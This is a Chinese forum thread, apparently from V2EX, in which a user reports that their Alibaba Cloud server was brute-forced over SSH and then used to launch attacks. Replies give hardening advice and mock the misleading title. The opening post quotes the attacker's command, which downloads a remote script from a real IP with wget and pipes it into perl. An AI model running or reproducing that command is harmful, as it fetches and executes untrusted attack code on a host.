webfamer

阿里云被人暴力破解了

  •  
  •   webfamer · 6h 56m ago · 5825 views
    看了下最近登陆地是法国,那人用这个命令:bash -c echo -e "\033[0m";echo -ne " \033[93m[\033[91m 1491/15819 \033[93m] \033[93m[\033[97m Executing cmd to \033[92m123.56.152.41:22 \033[93m] \033[96m ";wget -qO - 61.14.210.71/.j/sus3|perl

    下载了一堆爆破工具包到我服务器上,然后用我服务器跑攻击脚本。现在服务器被阿里云判定为恶意攻击,暂时封禁了
    38 replies    2026-07-14 18:14:16 +08:00
    webfamer
        1
    webfamer  
    OP
       6h 56m ago
    Yanlongli
        2
    Yanlongli  
       6h 43m ago
    太正常了,服务器天天被扫
    所以只开 私钥登录
    snowfuck
        3
    snowfuck  
       6h 37m ago
    没有类似 cloudflare tunnel 的东西吗?我一般都不暴露 ssh 端口出来。
    opengps
        4
    opengps  
       6h 33m ago   ❤️ 2
    有点这样的经历挺好的,不然根本理解不了为什么要做那么对防护操作,也理解不了渗透往往只是几个简单的漏洞组合起来的严重后果
    SoulFlame
        5
    SoulFlame  
       6h 32m ago   ❤️ 10
    只是你自己的云服务器。。。我还以为是阿里云。。。
    jacketma
        6
    jacketma  
       6h 30m ago
    @webfamer 楼主 ssh 用的弱密码吗?我的阿里云为了方便也开了远程 ssh 登录,端口也没改,不过是强密码,很多年了,看到一直有攻击,一直都没事😄
    y1y1
        7
    y1y1  
       5h 39m ago   ❤️ 6
    这标题起的
    icanfork
        8
    icanfork  
       5h 33m ago
    这标题,云服务器第一件事就是
    1. 禁止 root 登录
    2. 禁止密码登录,使用 ssh 密钥登录
    3. 修改默认 ssh 端口 22 到其他
    lululau
        9
    lululau  
       5h 15m ago   ❤️ 4
    你咋不说银河系被人暴力破解了
    w2GvCF
        10
    w2GvCF  
       5h 8m ago
    可以加强 ECS 安全组规则防护,限制远程连接服务器的 IP 地址,只允许自己的 IP 连接。
    定期修改服务器密码,设置复杂的密码,建议设置用 ssh 密钥方式远程连接服务器。
    这样基本就可以防护暴力破解了
    Cu635
        11
    Cu635  
       5h 5m ago
    最关键的,别人是怎么登录上去的没说,是 ssh 弱密码?
    june4
        12
    june4  
       4h 58m ago
    ssh 的 root 默认应该是个挺长的随机密码吧,几乎不太可能是这个原因,除非你为了自己方便改了弱密码。
    ThisDay
        13
    ThisDay  
       4h 57m ago
    不要总想搞个大新闻
    ingram22mb30
        14
    ingram22mb30  
       4h 46m ago
    123.56.152.41 ( C 段画像)‘恶意 IP 暴力破解’,整个/24 里一个 IP 是恶意 IP 。
    killva4624
        15
    killva4624  
       4h 37m ago
    你在 UC 上的班?
    menyuguren
        16
    menyuguren  
       4h 28m ago
    安装了哪吒面板?
    layxy
        17
    layxy  
       4h 26m ago
    我的 ssh 只开 ip 白名单访问,ip 平时不咋变,如果 ip 容易变嫌麻烦就使用密钥登录吧
    5waker
        18
    5waker  
       4h 25m ago
    ssh 换端口就能避免很多问题了,如果 ip 固定也可以考虑 ip 白名单
    jackerbauer
        19
    jackerbauer  
       4h 24m ago
    标题党
    opeth
        20
    opeth  
       4h 19m ago
    你这题目起的,我以为是阿里的服务器被攻击了
    wwwwjack
        21
    wwwwjack  
       4h 1m ago
    ssh 换端口 + 动态口令登录
    dhb233
        22
    dhb233  
       3h 53m ago
    前面看起来就是带颜色的字符串打印,不知道为什么还要带颜色。。。
    cecil2016
        23
    cecil2016  
       3h 50m ago
    @lululau 来 UC 报道
    cecil2016
        24
    cecil2016  
       3h 50m ago
    这标题起的
    BaiLinfeng
        25
    BaiLinfeng  
       3h 39m ago
    所以你的服务器是做的啥项目,他看上了
    Panameragt
        26
    Panameragt  
       3h 28m ago
    阿里云安全中心:😓
    WAHSUN
        27
    WAHSUN  
       3h 20m ago via iPhone
    在服务器中安装一个 Hermes ,让它给系统做安全加固,系统安全审计等工作,每天封禁封禁恶意 ip 。




    ---

    3 層防禦

    第 1 層:iptables 預設 DROP

    任何未明確允許的連線直接丟棄,並記錄到 /var/log/kern.log 。

    iptables-DROPPED: ... SRC=1.2.3.4 ...


    第 2 層:fail2ban ( SSH 監控)

    監控 SSH 日誌,有暴力嘗試就封鎖。不過因為密碼登入已關閉,目前累計 0 封鎖。

    第 3 層:auto-ban-ips.sh ✅ 已修復

    ⏰ 排程****
    • 內容: 每天 04:00

    📄 讀取來源****
    • 內容: /var/log/kern.log + kern.log.1

    🎯 門檻****
    • 內容: 累計 10 次以上 DROP 記錄的 IP

    🔧 動作****
    • 內容: iptables -A INPUT -s IP -j DROP

    💾 持久化****
    • 內容: iptables-save > /etc/iptables/rules.v4

    📧 通知****
    • 內容: 寄信到 [email protected]

    今天日誌裡已經有 10 個超過門檻的 IP 待處理(最高一個打了 397 次),明天凌晨就會自動 ban 掉它們。
    kevan
        28
    kevan  
       3h 0m ago
    标题党太狠了,害我白高兴以为阿里云官方沦陷了
    ZTom
        29
    ZTom  
       2h 57m ago
    666 ,去 uc 上班把
    ala2008
        30
    ala2008  
       2h 52m ago
    @icanfork 还漏一个设置 ip 白名单😁
    unclemcz
        31
    unclemcz  
       2h 49m ago via Android
    现在云服务器被暴力 ssh 的概率很低了,更多的是装了什么有漏洞的服务被无差别扫到了。
    新服务器保命第一步,开白名单或者私钥。
    pinylin
        32
    pinylin  
       2h 46m ago
    换端口没用,照样一堆渗透的
    1. 22 端口 用 endlessh 恶心他们,(我看到有 sb 脚本小子一次卡两三个小时的)
    2. 换个端口 用 fail2ban 继续拉黑名单
    zerovoid
        33
    zerovoid  
       2h 42m ago
    小心阿里云公关连夜给你发律师函。

    我阿里云服务器被人骇入了(√)
    阿里云被人破解了( x )
    nrtEBH
        34
    nrtEBH  
       2h 41m ago
    标题党啊标题党
    kasusa
        35
    kasusa  
       2h 40m ago
    @unclemcz 我之前的就被暴力破解了。
    这玩意还是不能用简单密码。
    A55555
        36
    A55555  
       2h 39m ago
    建议先学习中文语法主谓宾的含义。
    EvaElfie
        37
    EvaElfie  
       2h 25m ago
    开个密钥登录就完事了,哪这么多事
    flyqie
        38
    flyqie  
       28 mins ago
    你这标题吓我一跳,还寻思阿里云怎么有这问题了
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   3548 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 154ms · UTC 10:43 · PVG 18:43 · LAX 03:43 · JFK 06:43
    ♥ Do have faith in what you're doing.